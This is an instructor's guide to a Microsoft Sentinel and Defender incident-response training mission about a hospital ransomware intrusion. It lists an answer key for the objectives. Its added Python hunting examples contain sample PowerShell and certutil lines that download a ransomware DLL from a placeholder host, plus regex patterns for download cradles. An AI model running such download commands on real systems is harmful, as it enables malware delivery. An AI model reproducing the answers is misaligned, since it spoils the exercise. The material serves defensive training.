Security Immersion - Into The Breach - Instructors Guide - Aug 2022
©2022 Circadence Corporation. All rights reserved. Circadence, the Circadence logo, Project Ares, and the Project Ares logo
are trademarks or registered trademarks of Circadence in the U.S and in other countries.
All other trademarks or registered trademarks belong to their respective owners.
Table of Contents
Target Audience
Course Description
Prerequisites
Conventions Used in this Guide
Version Control
Player Access
  System Requirements
  Connectivity Test
  Account Activation
Instructor Login Process
Navigating Instructor Tools
Navigating the Instructor Dashboard
Navigation Basics: How to Run Into The Breach
Into The Breach Scenario Narrative
  Threat Actor’s Attack Path Summary
  Victim Scenario
  UVM Health (Victim) Network Architecture
Solving Mission Tasks
Using Hints to Solve Mission Tasks
Using the VNC console
Running Microsoft Sentinel
Running Microsoft 365 Defender
Microsoft 365 Defender and Sentinel Documentation
Answering Questions via the Analyst Portal
Into The Breach - Objectives and Solutions
  Objective 01: Can you take a Hint?
  Objective 02: Piling Bricks
  Objective 03: Malware Everywhere!
  Objective 04: Repeat Offender
  Objective 05: The Source of Evil
Course Description
The Microsoft Into The Breach (ITB) workshop will equip students with in-depth knowledge of
defending against a cyberattack using the Microsoft Defender and Sentinel cyber defense tools.
Prerequisites
Players should be familiar with the Microsoft Defender and Sentinel cyber defense tools.
Version Control
Version control for this document is maintained in Appendix A.
System Requirements
While we cannot control the type of endpoint participants use, we can reduce the risk of problems
by ensuring that their systems meet the minimum requirements for a good Project Ares experience.
If a player reports issues from the start of the event (for example, everything is running very
slowly), review the minimum system requirements with them.
Players can test their network connections by running the test located here:
https://projectares.academy/test-your-connection
Account Activation
Players should already have activated their accounts prior to the event; however, for last-minute
additions there is a resource to help get players activated and onto the platform.
A brief video on how to log on to Project Ares is available: Logging on to Project Ares.
Pro Tip: Have players bookmark our homepage: Welcome to Project Ares
After successfully logging on, you will be taken to the Home page. As an instructor you have access
to a Dashboard for tracking student progress, covered in the Instructor Dashboard section below.
Your account has been created with an Instructor profile, allowing you to enter as an Instructor.
Opening the Dashboard displays the Dashboard page, where you can view overall player progress on
this mission.
There are two options for launching the Microsoft Security Immersion Workshop - Into the Breach:
On the mission dashboard shown below, No Data Available appears the first time this mission runs.
The History tab displays information about dates, scores, and mission statistics.
On the left side, adjacent to the mission coin, is a brief description of the mission where players
choose a difficulty level and then click the button to begin the mission.
After the video, the Mission Control panel appears as shown below. Players click on the gold
button to review the mission’s orders.
Each tab provides the player with different informational aspects about the
mission. Clicking each tab sequentially allows the player to review each topic where they learn
important information related to the mission. On reading the final tab, clicking on
Continue returns the player back to Mission Control.
The mission button will initially ignite in red as the Azure cloud environment initializes
the Virtual Machines (VMs) required to run the mission scenarios.
1. Attacker sends a phishing email to several employees at UVM Health claiming that the connection
to their NMIS is faulty and requesting that they open the attached file for instructions on fixing it.
2. One employee opens the attached Word document, which triggers the execution of an embedded
malicious macro. The macro connects to the attacker’s C2 server to download a Remote Access
Trojan (RAT). When the RAT executes, the attacker receives a callback shell from the initial
access endpoint, REHAB-6.
4. Attacker identifies a network share containing patient records, then copies the contents of the share
to the local system before archiving and exfiltrating.
7. Attacker stages a Netcat executable, then sends an internal spearphishing email from the
compromised account (JROADER) to SBEAVERS. This email includes the renamed Netcat executable as
an attachment. The email is quarantined by Defender.
8. When the internal spearphishing attempt fails, the attacker performs a port scan of the network.
9. Attacker then targets SBEAVERS account for brute force against FLOOR-5-ADM (172.16.20.100)
using port 3389 (RDP).
10. With a successful RDP brute force, attacker uses the credentials to perform WMI commands on
FLOOR-5-ADM, including the creation of a scheduled task to get a callback and establish
persistence.
11. With RDP access, the attacker uses PsExec and Mimikatz to dump credential hashes.
12. With the hash for UVMADMIN, the attacker uses wmiexec to create a scheduled task to get a
callback and establish persistence on the DC.
13. Once on the Domain Controller (DC), attacker performs Active Directory (AD) recon using
Bloodhound.
14. Attacker attempts to stage ransomware on the DC, but the files are quarantined by Defender.
15. Attacker pivots to attacking from the NMIS endpoint, using that trusted connection to perform
remote execution in order to download and execute the ransomware on every accessible endpoint.
The Into The Breach players are being asked to assist with the Incident Response investigation
of an attack on the UVM Health network.
You have arrived at the hospital and begin working with the local IT support office. Their network
security was provided by a managed security service provider (MSSP), which still hosts an NMIS
with a trusted connection into the hospital.
Using the Field Operations screen below as a reference, note the second mission objective, “Piling
Bricks: On what endpoint did the ransomware execute successfully?”
The player can launch VNC Access to open a new browser window in order to access the Microsoft
Sentinel and Defender tools. If unable to answer a question, the player can seek help by clicking
on the question mark, which opens the Hints window shown below.
There are four hints, with the final hint providing the answer. A player who answers the Objective
challenge without hints receives the maximum points; each hint used lowers the maximum points
available. This gives players who determine the correct responses without using hints an
advantage, and they will have a greater chance of moving up the leaderboard. See the next section
for more details on how scoring works.
Players are not penalized for using hints in the sense that points are not subtracted from their
score; at the same time they will not be rewarded with the maximum points available. Because the
Leaderboard is based on points, the use of hints will lower a player’s position on the board.
They click on the question mark adjacent to the task objective. This opens the first page of
the hints window. The player then reviews the hint and is free to switch back to the console
window and attempt to solve the task objective.
If the player wishes to see a second hint, they click on the right arrow, revealing the second
hint. Likewise, they can continue through the hints until, in the final hint, the answer is
revealed.
Clicking on VNC Access will open a new browser window providing the player a remote console
where all of the tasks and exercises for this mission take place.
Notice the shortcut icon on the console desktop. Clicking on that icon will open a browser with
three tabs.
To launch Sentinel:
1. From the Field Operations screen, click on VNC Access. This will open a new browser for
access to the console.
2. From the console window, double-click on the Short-cut and, in the browser that opens, click
on the second tab to access Sentinel. (Note: the order of the tabs may be slightly different in
your session.)
3. Logon to Sentinel using the credentials provided in the credentials file, found on the console
home page.
5. In the Microsoft Azure search bar, type Microsoft Sentinel and select it from the results
window.
8. The incidents page is now open for use in solving Objectives. In many cases, you will need to
proceed to Defender to solve the Learning Objective. On the incidents page, click on an
incident where the Product name is Microsoft 365 Defender.
Remember to adjust the timeframe in both Defender and Sentinel if you do not get the
results you are expecting. Below is a screenshot of how to adjust the timeframe in Sentinel.
First click on the time range filter and then adjust the timeline; 14 days should work for most
objectives.
1. From the Field Operations screen, click on VNC Access. This will open a new browser for
access to the console.
2. From the console window, double-click on the Short-cut on the left of the screen. This will
open a browser with three tabs. Select the Defender tab.
3. Logon to Defender using the credentials provided in the credentials file, found on the
console home page.
Video: Click here to view the 365 Defender logon walkthrough video.
For convenience, these Microsoft Sentinel and Defender documents can be found on the web here:
Players will find the complete set of documents on the VNC console desktop by clicking on the
shortcut:
This opens the window where players can enter their answers.
Hint 1:
The first hint provides a small amount of information, just to get you started if you
weren't really sure where to start. You may view this hint without penalty. You'll still
get 100 points once you complete the objective.
Hint 2:
The second hint will expand upon the first. It will get you closer to the answer,
perhaps directing you to the specific portal where the indicator can be found. It will
usually provide some leading information on what to do (or not do) next. Viewing this
hint will cost you 25 points. Your score for completing the objective at this point
would be 75 points.
Hint 3:
The third hint will get you even closer to the answer. This hint will typically point you
toward the section within the portal, and might include some guidance for a query or
filter if appropriate. Viewing this hint will cost you another 25 points. You will receive
50 points for this objective once you complete it.
Hint 4:
The fourth and last hint will walk you through how to get the answer. We don't want
you completely stuck on a question! Viewing this hint will cost you another 25 points.
You will receive 25 points for this objective once you complete it.
For this Learning Objective, the student is expected to access Microsoft 365 Defender through the
shortcut on the VNC desktop and determine on which endpoints Defender terminated or prevented
the execution of the ransomware.
A combination of knowledge, research, and the in-game hints will lead the player to the
correct answer.
Here are the in-game hints provided to solve this Learning Objective:
Hint 1:
For additional information about the tools and features that might be helpful,
reference the "Investigate incidents with Microsoft Sentinel" link in the
Documentation folder on your Analyst desktop.
Hint 2:
Microsoft Sentinel's log aggregation and correlation can help us quickly identify high-
severity incidents. Access Microsoft Sentinel through the shortcut on the desktop or
navigate to https://portal.azure.com and select Microsoft Sentinel. Analyzing
anomalous account or system activity is one method to consider when searching for
potential ransomware on a network or endpoint devices. Depending on the size of the
network, this can be a daunting task to accomplish checking each endpoint device
one-by-one.
Hint 3:
Microsoft Sentinel can show us when incidents have been detected across our
security tools. In this scenario, it has aggregated data from Microsoft 365 Defender,
Microsoft Defender for Endpoint, and Microsoft Defender for Identity. Incidents and
alerts from Microsoft 365 Defender and Microsoft Defender for Endpoint will contain
the necessary evidence to help us find which endpoints ransomware executed on
successfully. With these tools, indications of a successful payload deployment will be
easily identifiable by locating suspicious incidents in the portal.
In Microsoft Sentinel, navigate to the Incidents tab under Threat management. Look
for a high severity alert from Microsoft 365 Defender related to privilege escalation
and ransomware*. Select that alert, then choose View full details. Scroll through the
Timeline tab reviewing the alerts. A few alerts will contain the answer you're looking
for, for example the 'Sodinokibi ransomware was detected’ alerts. From the incident
or Alert pages, you can also select Investigate in Microsoft 365 Defender or click the
Alert link to view the source data in the defender portal.
*Note: The name of the alert may change over time due to how M365D analytics works. For example, the alert
may refer to “privilege escalation and ransomware” or “initial access and exfiltration”; however, the “Multi-stage
incident involving” part of the alert appears to be consistent.
Now that we have some idea of where the ransomware successfully deployed and
which endpoint devices prevented infection, we can drill down into the specific
incidents where the infections occurred. Ransomware leaves a trail of activity behind
that can provide a detailed account of the initial execution and potentially where it
originated from.
For additional information about the tools and features that might be helpful,
reference the "Investigate incidents in Microsoft 365 Defender" link in the
Documentation folder on your Analyst desktop.
Microsoft 365 Defender is a great tool to find the answer to this question. Access
Microsoft 365 Defender through the shortcut on the desktop or navigate to
https://security.microsoft.com. Drilling down on a specific incident and
understanding how the ransomware was executed on the endpoint provides
extensive details about the ransomware including, but not limited to, the processes
that were started or stopped, commands executed during installation of the
ransomware, and the filename of the shared library that is the actual ransomware.
Microsoft 365 Defender portal is the primary location to determine the behavior of
the ransomware from installation through execution. Just viewing the top level
incident may not be enough, and you should investigate the incident in more detail
using the built-in features of the portal.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents & Alerts.
Look for the incident concerning privilege escalation and ransomware*. Open that
incident, then view the list of related alerts. A few alerts will contain the answer
you're looking for, for example the 'Sodinokibi ransomware was detected' alert. Open
that alert, then look through the Alert Story for a reference to a shared library.
*Note: The name of the alert may change over time due to how M365D analytics works. For example, the alert
may refer to “privilege escalation and ransomware” or “initial access and exfiltration”; however, the “Multi-stage
incident involving” part of the alert appears to be consistent.
mpsvc.dll
When they can, attackers will use a single mechanism to deploy malware across
many assets. In this scenario, you've seen that the attacker used PowerShell to
download the ransomware on an impacted device. For additional information about
the tools and features that might be helpful, reference the "Hunt for threats with
Microsoft Sentinel" link in the Documentation folder on your Analyst desktop.
At this point, using Microsoft Sentinel will greatly increase your chances of finding
specific pieces of information that may require specialized queries. Not all hope is
lost, as you can use the pre-built queries under Threat management to hunt for PowerShell
downloads.
In Microsoft Sentinel, select Hunting from under the Threat management category in
the left-hand menu. Look for the pre-built query about downloads via PowerShell,
using the search bar if needed. Before you select the query, set the appropriate time
range based on your knowledge of the attack. After you have set the time range,
select that query and click the View Results button. Review the results to see how
many assets the ransomware was downloaded to using PowerShell.
If you'd prefer not to count the lines, you could add the following logic to the end of
the query in order to get a succinct list of results related to the download of the DLL
file:
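As an added example (Python written for this guide, not the Sentinel hunting query or anything from the original mission content), the same hunt can be run offline over a handful of process-creation records. The records below are constructed: the download host 10.99.0.5, the file paths and the timestamps are placeholders, and only mpsvc.dll is taken from the objective above. The code matches common PowerShell download cradles, unpacks -EncodedCommand payloads (which a plain string search would miss), keeps only command lines that reference the DLL, and collapses the hits into one line per device, which is the "succinct list" the hint is after.

```python
import base64
import re
from collections import defaultdict


def encode_powershell(script):
    """PowerShell -EncodedCommand takes base64 of the UTF-16LE script.
    Used here only to build a realistic constructed sample event."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed DeviceProcessEvents-style records (not telemetry from the mission).
# Host 10.99.0.5 and all paths are placeholders; mpsvc.dll is the DLL named in the objective.
SAMPLE_EVENTS = [
    {"Timestamp": "2022-08-10T14:02:11Z", "DeviceName": "floor-5-adm", "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient)"
                           ".DownloadFile('http://10.99.0.5/mpsvc.dll','C:\\Windows\\Temp\\mpsvc.dll')\""},
    {"Timestamp": "2022-08-10T14:03:40Z", "DeviceName": "dc01", "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -nop -enc " + encode_powershell(
         "Invoke-WebRequest -Uri http://10.99.0.5/mpsvc.dll -OutFile C:\\Windows\\Temp\\mpsvc.dll")},
    {"Timestamp": "2022-08-10T14:05:02Z", "DeviceName": "rehab-6", "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell -ep bypass -c Start-BitsTransfer -Source http://10.99.0.5/mpsvc.dll"
                           " -Destination C:\\Users\\Public\\mpsvc.dll"},
    # Benign PowerShell, and a download of a different file: neither should be reported.
    {"Timestamp": "2022-08-10T14:06:00Z", "DeviceName": "floor-5-adm", "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -c Get-Process | Out-File C:\\Temp\\procs.txt"},
    {"Timestamp": "2022-08-10T14:07:15Z", "DeviceName": "floor-5-adm", "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -c Invoke-WebRequest -Uri http://intranet.local/update.ps1"
                           " -OutFile C:\\Temp\\update.ps1"},
    # Same DLL fetched with certutil: a real hunt would cover LOLBins too, but this one is PowerShell-only.
    {"Timestamp": "2022-08-10T14:08:30Z", "DeviceName": "rehab-6", "FileName": "cmd.exe",
     "ProcessCommandLine": "cmd.exe /c certutil -urlcache -f http://10.99.0.5/mpsvc.dll C:\\Windows\\Temp\\mpsvc.dll"},
]

POWERSHELL_BINARIES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
DOWNLOAD_CRADLE = re.compile(
    r"downloadfile|downloadstring|downloaddata|invoke-webrequest|invoke-restmethod|"
    r"start-bitstransfer|\biwr\b|\birm\b|\bcurl\b|\bwget\b", re.I)
URL = re.compile(r"https?://[^\s'\"()]+", re.I)
ENCODED_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the script hidden behind -enc/-EncodedCommand, or None if there is none."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt_powershell_downloads(events, target_file):
    """Return PowerShell events whose (decoded) command line downloads target_file."""
    hits = []
    for ev in events:
        if ev["FileName"].lower() not in POWERSHELL_BINARIES:
            continue
        decoded = decode_encoded_command(ev["ProcessCommandLine"])
        script = decoded if decoded is not None else ev["ProcessCommandLine"]
        if not DOWNLOAD_CRADLE.search(script) or target_file.lower() not in script.lower():
            continue
        hits.append({"Timestamp": ev["Timestamp"], "DeviceName": ev["DeviceName"],
                     "Urls": sorted(set(URL.findall(script))), "Encoded": decoded is not None})
    return hits


def summarize_by_device(hits):
    """Collapse hits into {device: [urls]}; len() of the result is the number of impacted assets."""
    per_device = defaultdict(set)
    for h in hits:
        per_device[h["DeviceName"]].update(h["Urls"])
    return {dev: sorted(urls) for dev, urls in sorted(per_device.items())}


if __name__ == "__main__":
    found = hunt_powershell_downloads(SAMPLE_EVENTS, "mpsvc.dll")
    summary = summarize_by_device(found)
    for device, urls in summary.items():
        print(f"{device}: {', '.join(urls)}")
    print(f"{len(summary)} assets downloaded the DLL via PowerShell")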
The Source of Evil - From what host did the attacker use remote commands to download and
execute the ransomware throughout the environment?
Attackers will often find a way into a network on an endpoint device or other host
that has little or no protection. This is usually a launching point to more critical
network devices or infrastructure that will provide the attacker with more control
over the larger network.
For additional information about the tools and features that might be helpful,
reference the "Investigate incidents in Microsoft 365 Defender" link in the
Documentation folder on your Analyst desktop.
Microsoft 365 Defender is a great tool to find the answer to this question. Access
Microsoft 365 Defender through the shortcut on the desktop or navigate to
https://security.microsoft.com
If using Microsoft Defender and looking at high level incidents that involve privilege
escalation, there are alerts that indicate suspicious usage of Windows Management
Instrumentation (WMI) that may lead to discovery of which device the attacker used
to execute the ransomware on the environment.
First, we need to identify which IP address the remote commands to download and
execute the ransomware came from. In Microsoft 365 Defender, navigate to the
Incidents tab under Incidents & Alerts. Look for the incident concerning privilege
escalation and ransomware*. Click on that incident to open the Incident Details page,
and click on the Alerts tab to view the list of related alerts. Look for an alert about
“suspicious WMI process creation.” Scroll through the Alert Story to find an event
where cmd.exe was invoked remotely. Expanding that event will provide the source IP address.
Now that we’ve identified 192.168.0.100 as the source of the remote execution, we
can review the network map to determine which host is associated with that IP
address.
*Note: The name of the alert may change over time due to how M365D analytics works. For example, the alert
may refer to “privilege escalation and ransomware” or “initial access and exfiltration”; however, the “Multi-stage
incident involving” part of the alert appears to be consistent.
NMIS
Sniffing Around - What Active Directory enumeration tool did the attacker use to gather information
on the Domain Controller?
Having information about how the ransomware was executed in the environment, we
can now expand our scope to understand what led up to that moment. Understanding
the ransomware can lead us into understanding what the attacker was doing as they
moved through the environment.
For additional information about the tools and features that might be helpful,
reference the "Investigate devices in the Microsoft Defender for Endpoint Devices
list" link in the Documentation folder on your Analyst desktop.
Microsoft 365 Defender is a great tool to find the answer to this question. Access
Microsoft 365 Defender through the shortcut on the desktop or navigate to
https://security.microsoft.com.
When attackers achieve initial access to an environment and as they move laterally
through it, they often perform discovery and enumeration tasks to gather as much
information as they can. Some alerts provide a clear indication about the activity that
the attacker was performing to acquire this information.
By using Microsoft 365 Defender and focusing on alerts on the domain controller you
should find clear indications of tool usage and the activity that the attacker
performed.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents & Alerts.
Look for the incident concerning privilege escalation and ransomware*. Click on that
incident to open Incident Details page, and click on the devices tab to view the list of
related devices. Select the Domain Controller (dc01) from this list. Choose the Alerts
tab to view the alerts detected on this particular endpoint. Look for an alert title
containing the name of a well-known Active Directory enumeration tool, which will
reference post-exploitation.
Bloodhound
Sneaking Through the Back - What administrative tool is used to establish persistence on the
Domain Controller? Provide the executable name.
Another common attacker technique for laying low is using common system tools to
perform aspects of their attack. This can help them stay hidden in the environment,
as security tools may be less likely to detect suspicious behavior from benign
applications.
For additional information about the tools and features that might be helpful,
reference the "Investigate devices in the Microsoft Defender for Endpoint Devices
list" link in the Documentation folder on your Analyst desktop.
Microsoft 365 Defender is a great tool to find the answer to this question. Access
Microsoft 365 Defender through the shortcut on the desktop or navigate to
https://security.microsoft.com.
Although most system tools provide a benefit to system efficiency and health, there
may be suspicious activities that are detected by Microsoft 365 Defender. Further
analysis of this type of activity is recommended to provide more insight into the how
the administrative tool was used to determine if it is legitimate use or actions taken
by an attacker.
Using the alerts in Microsoft 365 Defender for the specific endpoint in question will
provide enough information on how this administrative tool was used in this
objective.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents & Alerts.
Look for the incident concerning privilege escalation and ransomware*. Click on that
incident to open the Incident Details page, and click on the devices tab to view the
list of related devices. Select the Domain Controller (dc01) from this list. Choose the
Alerts tab to view the alerts detected on this particular endpoint. Look for an alert
title referencing the scheduling of tasks. Selecting this alert will show you the Alert Story.
*Note: The name of the alert may change over time due to how M365D analytics works. For example, the alert
may refer to “privilege escalation and ransomware” or “initial access and exfiltration”; however, the “Multi-stage
incident involving” part of the alert appears to be consistent.
schtasks.exe
Just like choosing to use common system tools, choosing names that blend in can
also help attackers hide from security tools and analysts.
For additional information about the tools and features that might be helpful,
reference the "Investigate devices in the Microsoft Defender for Endpoint Devices
list" link in the Documentation folder on your Analyst desktop.
Microsoft 365 Defender is a great tool to find the answer to this question. Access
Microsoft 365 Defender through the shortcut on the desktop or navigate to
https://security.microsoft.com.
Further analysis of the suspicious activity discovered on the domain controller and
the system tool that was used to conduct this activity provides detailed knowledge of
how the attacker gained persistence on the target.
The alerts listed for the domain controller in Microsoft 365 Defender provide a wealth
of knowledge on how the attacker gained persistence to this endpoint. You must drill
down into alerts related to this activity to discover the name of the task used by the
attacker.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents & Alerts.
Look for the incident concerning privilege escalation and ransomware*. Click on that
incident to open the incident Details page, and click on the devices tab to view the
list of related devices. Select the Domain Controller (dc01) from this list. Choose the
Alerts tab to view the alerts detected on this particular endpoint. Look for an alert
title referencing the scheduling of tasks. Selecting this alert will show you the Alert
Story. Look for the events where the scheduled task is being created via a command.
The '/tr' switch designates the executable name, while the '/tn' switch sets the task
name.
By identifying the persistence mechanism we have learned that it may have been
used to connect back to the attacker's machine, where they would most likely have a
listener waiting.
For additional information about the tools and features that might be helpful,
reference the "Investigate devices in the Microsoft Defender for Endpoint Devices
list" link in the Documentation folder on your Analyst desktop.
Microsoft 365 Defender is a great tool to find the answer to this question. Access
Microsoft 365 Defender through the shortcut on the desktop or navigate to
https://security.microsoft.com. In order to blend in with normal traffic, the attacker is
likely to choose a destination port that would typically be seen as totally normal. This
traffic may not be easily discovered like more intrusive activities that typically
generate alerts. Understanding the time frame that the attack occurred will be
beneficial to other forms of analysis to discover activity that may appear to be normal
to the system.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents & Alerts.
Look for the incident concerning privilege escalation and ransomware*. Click on that
incident to open the Incident Details page, and click on the devices tab to view the
list of related devices. Select the Domain Controller (dc01) from this list. Choose the
Timeline tab to view the timeline of events detected by Defender, even ones that
aren't correlated with an alert or incident. Change the time frame to fit the attack
scope, and set a filter for Network events. To make finding the particular network
*Note: The name of the alert may change over time due to how M365D analytics works. For example, the alert
may refer to “privilege escalation and ransomware” or “initial access and exfiltration”; however, the “Multi-stage
incident involving” part of the alert appears to be consistent.
40.77.31.232:8443
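The timeline review above is done by eye in the portal. As an added example (Python written for this guide, not a Defender feature or anything from the original mission), the same triage can be scripted over constructed network events: keep only the device's connections inside the attack window, drop destinations in the hospital's own ranges, group the rest by remote ip:port, and rank destinations that are contacted at regular intervals first, because a scheduled task calling back to a listener produces exactly that pattern even when the port looks ordinary. The records are constructed: 40.77.31.232:8443 is the answer above, callback.exe stands in for the task's executable (the guide does not name it), 203.0.113.10 is a documentation address used as benign noise, and the timestamps are invented.

```python
import ipaddress
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

# The hospital's internal ranges, chosen to cover the addresses in the scenario (172.16.x.x, 192.168.x.x).
# Listed explicitly rather than relying on ipaddress.is_private, so the analyst decides what is "internal".
INTERNAL_NETWORKS = [ipaddress.ip_network(n) for n in
                     ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

TIME_FMT = "%Y-%m-%dT%H:%M:%SZ"
ATTACK_TIME = datetime(2022, 8, 10, 15, 0, 0)  # constructed anchor for the sample timeline
ATTACK_WINDOW = (ATTACK_TIME - timedelta(hours=1), ATTACK_TIME + timedelta(hours=1))


def _stamp(offset_s):
    return (ATTACK_TIME + timedelta(seconds=offset_s)).strftime(TIME_FMT)


def _event(offset_s, remote_ip, remote_port, process, device="dc01"):
    return {"Timestamp": _stamp(offset_s), "DeviceName": device, "RemoteIP": remote_ip,
            "RemotePort": remote_port, "InitiatingProcessFileName": process}


# Constructed DeviceNetworkEvents-style records (not telemetry from the mission).
SAMPLE_NETWORK_EVENTS = (
    # six connections to one host:port roughly every 60 s: the scheduled-task callback
    [_event(s, "40.77.31.232", 8443, "callback.exe") for s in (0, 60, 121, 180, 239, 300)]
    # ordinary internal traffic that must be ignored
    + [_event(s, "172.16.20.100", 445, "System") for s in (10, 70, 130)]
    + [_event(15, "192.168.0.100", 135, "svchost.exe")]
    # an external destination contacted at irregular times
    + [_event(s, "203.0.113.10", 443, "svchost.exe") for s in (5, 950, 1000)]
    # the same callback host a day earlier, outside the investigation window
    + [_event(-86400, "40.77.31.232", 8443, "callback.exe")]
)


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETWORKS)


def find_callbacks(events=SAMPLE_NETWORK_EVENTS, device="dc01", window=ATTACK_WINDOW,
                   min_count=3, jitter_ratio=0.2):
    """Group a device's outbound connections in the window by external ip:port and
    flag destinations contacted at regular intervals (beacon-like) as most suspicious."""
    start, end = window
    by_dest = defaultdict(list)
    for ev in events:
        if ev["DeviceName"] != device or is_internal(ev["RemoteIP"]):
            continue
        t = datetime.strptime(ev["Timestamp"], TIME_FMT)
        if start <= t <= end:
            by_dest[(ev["RemoteIP"], ev["RemotePort"])].append((t, ev["InitiatingProcessFileName"]))

    results = []
    for (ip, port), conns in by_dest.items():
        conns.sort()
        times = [t for t, _ in conns]
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        median_gap = statistics.median(gaps) if gaps else None
        # Evenly spaced connections with little jitter are the signature of a timed callback.
        regular = (len(conns) >= min_count and median_gap > 0
                   and statistics.pstdev(gaps) / median_gap <= jitter_ratio)
        results.append({"remote": f"{ip}:{port}", "count": len(conns),
                        "processes": sorted({p for _, p in conns}),
                        "median_gap_s": median_gap, "regular": regular})
    results.sort(key=lambda r: (not r["regular"], -r["count"]))
    return results


if __name__ == "__main__":
    for r in find_callbacks():
        print(f"{r['remote']:<22} {r['count']:>3} conns  median gap {r['median_gap_s']}s  "
              f"regular={r['regular']}  {','.join(r['processes'])}")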
Friend or Foe? What management protocol was used to perform remote execution against the
Domain Controller?
The practice of using system tools is often called 'living off the land' by people in
cybersecurity. The attacker can count themselves fortunate when they find system
tools that let them remotely access or interact with other endpoints in the
environment.
For additional information about the tools and features that might be helpful,
reference the "Investigate devices in the Microsoft Defender for Endpoint Devices
list" link in the Documentation folder on your Analyst desktop.
Microsoft 365 Defender is a great tool to find the answer to this question. Access
Microsoft 365 Defender through the shortcut on the desktop or navigate to
https://security.microsoft.com.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents & Alerts.
Look for the incident concerning privilege escalation and ransomware*. Click on that
incident to open the Incident Details page, and click on the devices tab to view the
list of related devices. Select the Domain Controller (dc01) from the list. Choose the
Alerts tab to view the alerts detected on this particular endpoint. Look for an alert
title concerning suspicious process creation which references a common Windows
management protocol.
Same Task, Different Box - On what other endpoint did the attacker create the same scheduled task
using a different executable?
Like the rest of us humans, attackers are creatures of habit and benefit from
efficiency. As a result, they are just as prone to reusing tools and techniques as the
rest of us. In this scenario, the attacker used the same method for establishing
persistence on the middle endpoint they compromised as they did on the DC.
For additional information about the tools and features that might be helpful,
reference the "Proactively hunt for threats with advanced hunting" link in the
Documentation folder on your Analyst desktop.
Sometimes, Microsoft 365 Defender finds a behavior suspicious on one endpoint, but
not on another. This could be the result of many factors, including configurations or
auditing rules, but it can also be based on contextual data about the overarching
activities seen on each endpoint. Since Defender for Endpoint didn't alert on any
other suspicious scheduled tasks, we can leverage its Hunting capabilities to
broaden our search for this specific behavior.
Microsoft 365 Defender Advanced Hunting lets us use the Kusto Query Language
(KQL) to search data across our sources for results that match our requirements. For
our purposes, we can craft a query for all events containing the name of the
scheduled task we identified previously. If we knew the event ID for scheduled task
creation offhand, we could use that as a filter as well. Since KQL is
also used by Microsoft Sentinel, we could search either tool using the same query.
In Microsoft 365 Defender, navigate to Advanced Hunting under Hunting in the left-
hand menu. Add your query to the Query field, leveraging the Schema and Functions
tabs if needed for guidance. Adjust your timeframe as needed, then click Run query.
The query below will do the trick in this scenario.
DeviceEvents
floor-5-adm
The Sneakiest of Services - What is the filename of the executable used to establish persistence after
the first lateral movement?
For this scheduled task, the attacker used a different executable. Unlike on the DC,
where they executed a callback to a network listener on their end, this time they put
the listener on the internal endpoint but disguised it as a common service executable.
This is another clever way attackers try to disguise their actions.
For additional information about the tools and features that might be helpful,
reference the "Investigate devices in the Microsoft Defender for Endpoint Devices
list" link in the Documentation folder on your Analyst desktop.
Microsoft 365 Defender doesn't only enable you to view and analyze data related to
alerts and incidents, it also gathers event data from endpoints. This is great for
adding more context to understand what happened around overtly suspicious or
malicious activity. The Timeline tab for each onboarded endpoint lets you filter by
timeframe and event type, as well as providing a Search feature to make narrowing
down the results even easier.
As is often the case, using multiple ways of filtering at once can help us find the
answers we need more efficiently. Rather than applying one filter and scrolling
through the thousands of events accumulated in the Timeline view, consider how
multiple filters could help narrow down your results. For this step, searching for a
known string in combination with filtering by event type and timeframe could be
useful.
In Microsoft 365 Defender, navigate to the Devices list under the Assets category,
then select floor-5-adm from the list. Choose the Timeline tab to view the timeline of
events detected by Defender, even ones that aren't correlated with an alert or
incident. Change the timeframe to fit the attack scope, and set a filter for Scheduled
Task events. To make finding the right event easier, add the name of the scheduled
task to the Search field: Network Controller Manager.
svchost.exe
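The hunt in "Same Task, Different Box" and the Timeline search in "The Sneakiest of Services" both come down to the same operation: take every scheduled-task creation event across all onboarded devices, keep the ones whose task name matches, and read off which executable each task runs. The example below is added to this guide and is not code from Circadence or Microsoft; it replays that logic offline in Python over constructed rows that imitate the shape of DeviceEvents records. The assumption that the task name and task XML arrive in AdditionalFields as TaskName and TaskContent is ours, as are the file paths, the timestamps and the placeholder name for the DC's callback binary; only the task name, the device names and svchost.exe come from the guide. In KQL the same hunt is a filter on DeviceEvents for ActionType == "ScheduledTaskCreated" followed by a contains match on the task name.

```python
"""Offline replay of the scheduled-task hunt and the Timeline search.

Constructed example: the rows imitate Defender for Endpoint DeviceEvents
(DeviceName, Timestamp, ActionType, InitiatingProcessFileName,
AdditionalFields) but are made up for this exercise, not lab telemetry.
"""
import json
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

# Minimal scheduled-task XML, namespaced like the real Task Scheduler schema.
TASK_XML = (
    '<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
    "<Actions><Exec><Command>{command}</Command></Exec></Actions></Task>"
)


def _task_row(ts: str, device: str, task_name: str, command: str) -> Dict:
    """Build one constructed ScheduledTaskCreated row (assumed field layout)."""
    return {
        "Timestamp": ts,
        "DeviceName": device,
        "ActionType": "ScheduledTaskCreated",
        "InitiatingProcessFileName": "schtasks.exe",
        "AdditionalFields": json.dumps(
            {"TaskName": "\\" + task_name,
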